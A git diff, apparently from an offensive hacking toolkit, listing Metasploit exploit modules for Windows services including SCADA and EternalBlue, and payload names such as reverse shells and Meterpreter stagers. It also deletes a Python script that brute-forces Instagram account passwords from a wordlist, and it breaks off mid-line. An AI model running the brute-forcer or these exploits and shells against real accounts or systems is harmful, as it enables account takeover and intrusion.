windows/mssql/mssql_payload 2000-05-30 excellent Yes Microsoft SQL Server Payload Execution + 1759 windows/mssql/mssql_payload_sqli 2000-05-30 excellent No Microsoft SQL Server Payload Execution via SQL Injection + 1760 windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution + 1761 windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse + 1762 windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow + 1763 windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Yes Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential + 1764 windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow + 1765 windows/nntp/ms05_030_nntp 2005-06-14 normal No MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow + 1766 windows/novell/file_reporter_fsfui_upload 2012-11-16 great No NFR Agent FSFUI Record File Upload RCE + 1767 windows/novell/groupwisemessenger_client 2008-07-02 normal No Novell GroupWise Messenger Client Buffer Overflow + 1768 windows/novell/netiq_pum_eval 2012-11-15 excellent Yes NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution + 1769 windows/novell/nmap_stor 2006-12-23 average No Novell NetMail NMAP STOR Buffer Overflow + 1770 windows/novell/zenworks_desktop_agent 2005-05-19 good No Novell ZENworks 6.5 Desktop/Server Management Overflow + 1771 windows/novell/zenworks_preboot_op21_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow + 1772 windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow + 1773 windows/novell/zenworks_preboot_op6_bof 2010-03-30 normal No Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow + 1774 windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal No Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow + 1775 windows/nuuo/nuuo_cms_fu 2018-10-11 manual No Nuuo Central Management Server Authenticated Arbitrary File Upload + 1776 windows/nuuo/nuuo_cms_sqli 2018-10-11 normal No Nuuo Central Management Authenticated SQL Server SQLi + 1777 windows/oracle/client_system_analyzer_upload 2011-01-18 excellent Yes Oracle Database Client System Analyzer Arbitrary File Upload + 1778 windows/oracle/extjob 2007-01-01 excellent Yes Oracle Job Scheduler Named Pipe Command Execution + 1779 windows/oracle/osb_ndmp_auth 2009-01-14 good No Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow + 1780 windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow + 1781 windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow + 1782 windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow + 1783 windows/pop3/seattlelab_pass 2003-05-07 great No Seattle Lab Mail 5.5 POP3 Buffer Overflow + 1784 windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution + 1785 windows/proxy/bluecoat_winproxy_host 2005-01-05 great No Blue Coat WinProxy Host Header Overflow + 1786 windows/proxy/ccproxy_telnet_ping 2004-11-11 average Yes CCProxy Telnet Proxy Ping Overflow + 1787 windows/proxy/proxypro_http_get 2004-02-23 great No Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow + 1788 windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Yes Qbik WinGate WWW Proxy Server URL Processing Overflow + 1789 windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution + 1790 windows/scada/advantech_webaccess_dashboard_file_upload 2016-02-05 excellent Yes Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload + 1791 windows/scada/advantech_webaccess_webvrpcs_bof 2017-11-02 good No Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow + 1792 windows/scada/citect_scada_odbc 2008-06-11 normal No CitectSCADA/CitectFacilities ODBC Buffer Overflow + 1793 windows/scada/codesys_gateway_server_traversal 2013-02-02 excellent No SCADA 3S CoDeSys Gateway Server Directory Traversal + 1794 windows/scada/codesys_web_server 2011-12-02 normal Yes SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow + 1795 windows/scada/daq_factory_bof 2011-09-13 good No DaqFactory HMI NETB Request Overflow + 1796 windows/scada/delta_ia_commgr_bof 2018-07-02 normal No Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow + 1797 windows/scada/factorylink_csservice 2011-03-25 normal No Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow + 1798 windows/scada/factorylink_vrn_09 2011-03-21 average No Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow + 1799 windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution + 1800 windows/scada/iconics_genbroker 2011-03-21 good No Iconics GENESIS32 Integer Overflow Version 9.21.201.01 + 1801 windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good No ICONICS WebHMI ActiveX Buffer Overflow + 1802 windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow + 1803 windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow + 1804 windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities + 1805 windows/scada/igss_exec_17 2011-03-21 excellent No Interactive Graphical SCADA System Remote Command Injection + 1806 windows/scada/indusoft_webstudio_exec 2011-11-04 excellent Yes InduSoft Web Studio Arbitrary Upload Remote Code Execution + 1807 windows/scada/moxa_mdmtool 2010-10-20 great No MOXA Device Manager Tool 2.1 Buffer Overflow + 1808 windows/scada/procyon_core_server 2011-09-08 normal Yes Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow + 1809 windows/scada/realwin 2008-09-26 great No DATAC RealWin SCADA Server Buffer Overflow + 1810 windows/scada/realwin_on_fc_binfile_a 2011-03-21 great No DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow + 1811 windows/scada/realwin_on_fcs_login 2011-03-21 great No RealWin SCADA Server DATAC Login Buffer Overflow + 1812 windows/scada/realwin_scpc_initialize 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow + 1813 windows/scada/realwin_scpc_initialize_rf 2010-10-15 great No DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow + 1814 windows/scada/realwin_scpc_txtevent 2010-11-18 great No DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow + 1815 windows/scada/scadapro_cmdexe 2011-09-16 excellent No Measuresoft ScadaPro Remote Command Execution + 1816 windows/scada/sunway_force_control_netdbsrv 2011-09-22 great No Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57 + 1817 windows/scada/winlog_runtime 2011-01-13 great No Sielco Sistemi Winlog Buffer Overflow + 1818 windows/scada/winlog_runtime_2 2012-06-04 normal No Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16 + 1819 windows/scada/yokogawa_bkbcopyd_bof 2014-03-10 normal Yes Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow + 1820 windows/scada/yokogawa_bkesimmgr_bof 2014-03-10 normal Yes Yokogawa CS3000 BKESimmgr.exe Buffer Overflow + 1821 windows/scada/yokogawa_bkfsim_vhfd 2014-05-23 normal No Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow + 1822 windows/scada/yokogawa_bkhodeq_bof 2014-03-10 average Yes Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow + 1823 windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow + 1824 windows/sip/sipxezphone_cseq 2006-07-10 great No SIPfoundry sipXezPhone 0.35a CSeq Field Overflow + 1825 windows/sip/sipxphone_cseq 2006-07-10 great No SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow + 1826 windows/smb/generic_smb_dll_injection 2015-03-04 manual No Generic DLL Injection From Shared Resource + 1827 windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource + 1828 windows/smb/ipass_pipe_exec 2015-01-21 excellent Yes IPass Control Pipe Remote Command Execution + 1829 windows/smb/ms03_049_netapi 2003-11-11 good No MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow + 1830 windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow + 1831 windows/smb/ms04_011_lsass 2004-04-13 good No MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow + 1832 windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow + 1833 windows/smb/ms05_039_pnp 2005-08-09 good Yes MS05-039 Microsoft Plug and Play Service Overflow + 1834 windows/smb/ms06_025_rasmans_reg 2006-06-13 good No MS06-025 Microsoft RRAS Service RASMAN Registry Overflow + 1835 windows/smb/ms06_025_rras 2006-06-13 average No MS06-025 Microsoft RRAS Service Overflow + 1836 windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow + 1837 windows/smb/ms06_066_nwapi 2006-11-14 good No MS06-066 Microsoft Services nwapi32.dll Module Exploit + 1838 windows/smb/ms06_066_nwwks 2006-11-14 good No MS06-066 Microsoft Services nwwks.dll Module Exploit + 1839 windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow + 1840 windows/smb/ms07_029_msdns_zonename 2007-04-12 manual No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) + 1841 windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption + 1842 windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference + 1843 windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution + 1844 windows/smb/ms10_061_spoolss 2010-09-14 excellent No MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability + 1845 windows/smb/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution + 1846 windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption + 1847 windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ + 1848 windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution + 1849 windows/smb/netidentity_xtierrpcpipe 2009-04-06 great No Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow + 1850 windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution + 1851 windows/smb/psexec_psh 1999-01-01 manual No Microsoft Windows Authenticated Powershell Command Execution + 1852 windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery + 1853 windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution + 1854 windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow + 1855 windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution + 1856 windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good Yes TABS MailCarrier v2.51 SMTP EHLO Overflow + 1857 windows/smtp/mercury_cram_md5 2007-08-18 great No Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow + 1858 windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good Yes MS03-046 Exchange 2000 XEXCH50 Heap Overflow + 1859 windows/smtp/njstar_smtp_bof 2011-10-31 normal Yes NJStar Communicator 3.00 MiniSMTP Buffer Overflow + 1860 windows/smtp/sysgauge_client_bof 2017-02-28 normal No SysGauge SMTP Validation Buffer Overflow + 1861 windows/smtp/wmailserver 2005-07-11 average No SoftiaCom WMailserver 1.0 Buffer Overflow + 1862 windows/smtp/ypops_overflow1 2004-09-27 average Yes YPOPS 0.6 Buffer Overflow + 1863 windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow + 1864 windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass + 1865 windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow + 1866 windows/ssh/putty_msg_debug 2002-12-16 normal No PuTTY Buffer Overflow + 1867 windows/ssh/securecrt_ssh1 2002-07-23 average No SecureCRT SSH1 Buffer Overflow + 1868 windows/ssh/sysax_ssh_username 2012-02-27 normal Yes Sysax 5.53 SSH Username Buffer Overflow + 1869 windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow + 1870 windows/telnet/gamsoft_telsrv_username 2000-07-17 average Yes GAMSoft TelSrv 1.5 Username Buffer Overflow + 1871 windows/telnet/goodtech_telnet 2005-03-15 average No GoodTech Telnet Server Buffer Overflow + 1872 windows/tftp/attftp_long_filename 2006-11-27 average No Allied Telesyn TFTP Server 1.9 Long Filename Overflow + 1873 windows/tftp/distinct_tftp_traversal 2012-04-08 excellent No Distinct TFTP 3.10 Writable Directory Traversal Execution + 1874 windows/tftp/dlink_long_filename 2007-03-12 good No D-Link TFTP 1.0 Long Filename Buffer Overflow + 1875 windows/tftp/futuresoft_transfermode 2005-05-31 average No FutureSoft TFTP Server 2000 Transfer-Mode Overflow + 1876 windows/tftp/netdecision_tftp_traversal 2009-05-16 excellent No NetDecision 4.2 TFTP Writable Directory Traversal Execution + 1877 windows/tftp/opentftp_error_code 2008-07-05 average No OpenTFTP SP 1.4 Error Packet Overflow + 1878 windows/tftp/quick_tftp_pro_mode 2008-03-27 good No Quick FTP Pro 2.1 Transfer-Mode Overflow + 1879 windows/tftp/tftpd32_long_filename 2002-11-19 average No TFTPD32 Long Filename Buffer Overflow + 1880 windows/tftp/tftpdwin_long_filename 2006-09-21 great No TFTPDWIN v0.4.2 Long Filename Buffer Overflow + 1881 windows/tftp/tftpserver_wrq_bof 2008-03-26 normal No TFTP Server for Windows 1.4 ST WRQ Buffer Overflow + 1882 windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow + 1883 windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) + 1884 windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow + 1885 windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow + 1886 windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow + 1887 windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow + 1888 windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow + 1889 windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution + 1890 windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite + diff --git a/tools/htkbanner.txt b/tools/htkbanner.txt new file mode 100644 index 0000000..09deabe --- /dev/null +++ b/tools/htkbanner.txt @@ -0,0 +1,5 @@ + _ _ _ _ _ _ _ + | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ + | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| + | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ + |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__| diff --git a/tools/instagram.py b/tools/instagram.py deleted file mode 100644 index 2eee1cc..0000000 --- a/tools/instagram.py +++ /dev/null @@ -1,61 +0,0 @@ -# Date: 05/05/2018 -# Author: Pure-L0G1C -# Description: Bruteforce Instagram - -from time import sleep -from os.path import exists -from sys import exit, version -from lib.bruter import Bruter -from lib.session import Session -from argparse import ArgumentParser - -def _input(msg): - return raw_input(msg).lower() if int(version.split()[0].split('.')[0]) == 2 else input(msg).lower() - -def main(): - - # assign arugments - args = ArgumentParser() - args.add_argument('username', help='email or username') - args.add_argument('wordlist', help='password list') - args.add_argument('threads', help='password per seconds. Any number <= 16') - args = args.parse_args() - - if not exists(args.wordlist): - exit('[!] Unable to locate `{}`'.format(args.wordlist)) - - if not args.threads.isdigit(): - exit('[!] Threads must be a number') - - # assign variables - engine = Bruter(args.username.title(), int(args.threads), args.wordlist) - session = Session(args.username.title(), args.wordlist) - - if session.exists(): - if _input('Do you want to resume the attack? [y/n]: ').split()[0][0] == 'y': - data = session.read() - if data: - engine.attempts = int(data['attempts']) - engine.passlist.queue = eval(data['queue']) - engine.retrieve = True - - # start attack - try: - engine.start() - except KeyboardInterrupt: - engine.user_abort = True - finally: - if all([engine.spyder.proxy_info, not engine.isFound]): - engine.display(engine.pwd) - - if all([not engine.read, engine.user_abort, not engine.isFound]): - print('{}[!] Exiting ...'.format('' if not engine.spyder.proxy_info else '\n')) - - if all([engine.read, not engine.isFound]): - print('\n[*] Password not found') - - sleep(1.5) - engine.stop() - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/tools/payloads.txt b/tools/payloads.txt index 76b9bed..455fc21 100644 --- a/tools/payloads.txt +++ b/tools/payloads.txt @@ -1,546 +1,553 @@ Payloads ======== - Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- - aix/ppc/shell_bind_tcp normal No AIX Command Shell, Bind TCP Inline - aix/ppc/shell_find_port normal No AIX Command Shell, Find Port Inline - aix/ppc/shell_interact normal No AIX execve Shell for inetd - aix/ppc/shell_reverse_tcp normal No AIX Command Shell, Reverse TCP Inline - android/meterpreter/reverse_http normal No Android Meterpreter, Android Reverse HTTP Stager - android/meterpreter/reverse_https normal No Android Meterpreter, Android Reverse HTTPS Stager - android/meterpreter/reverse_tcp normal No Android Meterpreter, Android Reverse TCP Stager - android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline - android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline - android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline - android/shell/reverse_http normal No Command Shell, Android Reverse HTTP Stager - android/shell/reverse_https normal No Command Shell, Android Reverse HTTPS Stager - android/shell/reverse_tcp normal No Command Shell, Android Reverse TCP Stager - apple_ios/aarch64/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline - apple_ios/aarch64/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline - apple_ios/aarch64/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline - apple_ios/aarch64/shell_reverse_tcp normal No Apple iOS aarch64 Command Shell, Reverse TCP Inline - bsd/sparc/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline - bsd/sparc/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/vax/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/x64/exec normal No BSD x64 Execute Command - bsd/x64/shell_bind_ipv6_tcp normal No BSD x64 Command Shell, Bind TCP Inline (IPv6) - bsd/x64/shell_bind_tcp normal No BSD x64 Shell Bind TCP - bsd/x64/shell_bind_tcp_small normal No BSD x64 Command Shell, Bind TCP Inline - bsd/x64/shell_reverse_ipv6_tcp normal No BSD x64 Command Shell, Reverse TCP Inline (IPv6) - bsd/x64/shell_reverse_tcp normal No BSD x64 Shell Reverse TCP - bsd/x64/shell_reverse_tcp_small normal No BSD x64 Command Shell, Reverse TCP Inline - bsd/x86/exec normal No BSD Execute Command - bsd/x86/metsvc_bind_tcp normal No FreeBSD Meterpreter Service, Bind TCP - bsd/x86/metsvc_reverse_tcp normal No FreeBSD Meterpreter Service, Reverse TCP Inline - bsd/x86/shell/bind_ipv6_tcp normal No BSD Command Shell, Bind TCP Stager (IPv6) - bsd/x86/shell/bind_tcp normal No BSD Command Shell, Bind TCP Stager - bsd/x86/shell/find_tag normal No BSD Command Shell, Find Tag Stager - bsd/x86/shell/reverse_ipv6_tcp normal No BSD Command Shell, Reverse TCP Stager (IPv6) - bsd/x86/shell/reverse_tcp normal No BSD Command Shell, Reverse TCP Stager - bsd/x86/shell_bind_tcp normal No BSD Command Shell, Bind TCP Inline - bsd/x86/shell_bind_tcp_ipv6 normal No BSD Command Shell, Bind TCP Inline (IPv6) - bsd/x86/shell_find_port normal No BSD Command Shell, Find Port Inline - bsd/x86/shell_find_tag normal No BSD Command Shell, Find Tag Inline - bsd/x86/shell_reverse_tcp normal No BSD Command Shell, Reverse TCP Inline - bsd/x86/shell_reverse_tcp_ipv6 normal No BSD Command Shell, Reverse TCP Inline (IPv6) - bsdi/x86/shell/bind_tcp normal No BSDi Command Shell, Bind TCP Stager - bsdi/x86/shell/reverse_tcp normal No BSDi Command Shell, Reverse TCP Stager - bsdi/x86/shell_bind_tcp normal No BSDi Command Shell, Bind TCP Inline - bsdi/x86/shell_find_port normal No BSDi Command Shell, Find Port Inline - bsdi/x86/shell_reverse_tcp normal No BSDi Command Shell, Reverse TCP Inline - cmd/mainframe/apf_privesc_jcl normal No JCL to Escalate Privileges - cmd/mainframe/bind_shell_jcl normal No Z/OS (MVS) Command Shell, Bind TCP - cmd/mainframe/generic_jcl normal No Generic JCL Test for Mainframe Exploits - cmd/mainframe/reverse_shell_jcl normal No Z/OS (MVS) Command Shell, Reverse TCP - cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK) - cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd) - cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd) - cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua) - cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat) - cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e) - cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6 - cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs) - cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) - cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 - cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R) - cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) - cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 - cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat) - cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub) - cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh) - cmd/unix/generic normal No Unix Command, Generic Command Execution - cmd/unix/interact normal No Unix Command, Interact with Established Connection - cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) - cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK) - cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp) - cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) - cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh) - cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua) - cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat) - cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat) - cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e) - cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs) - cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl) - cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) - cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) - cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php) - cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python) - cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python) - cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R) - cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) - cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) - cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat) - cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) - cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub) - cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh) - cmd/windows/adduser normal No Windows Execute net user /ADD CMD - cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua) - cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl) - cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6 - cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby) - cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS - cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs) - cmd/windows/generic normal No Windows Command, Generic Command Execution - cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua) - cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl) - cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell) - cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby) - firefox/exec normal No Firefox XPCOM Execute Command - firefox/shell_bind_tcp normal No Command Shell, Bind TCP (via Firefox XPCOM script) - firefox/shell_reverse_tcp normal No Command Shell, Reverse TCP (via Firefox XPCOM script) - generic/custom normal No Custom Payload - generic/debug_trap normal No Generic x86 Debug Trap - generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline - generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline - generic/tight_loop normal No Generic x86 Tight Loop - java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline - java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline - java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager - java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager - java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager - java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager - java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager - java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager - java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline - linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager - linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/armbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/armbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/armbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/armbe/shell_bind_tcp normal No Linux ARM Big Endian Command Shell, Bind TCP Inline - linux/armle/adduser normal No Linux Add User - linux/armle/exec normal No Linux Execute Command - linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager - linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager - linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager - linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/mips64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/mips64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mips64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsbe/exec normal No 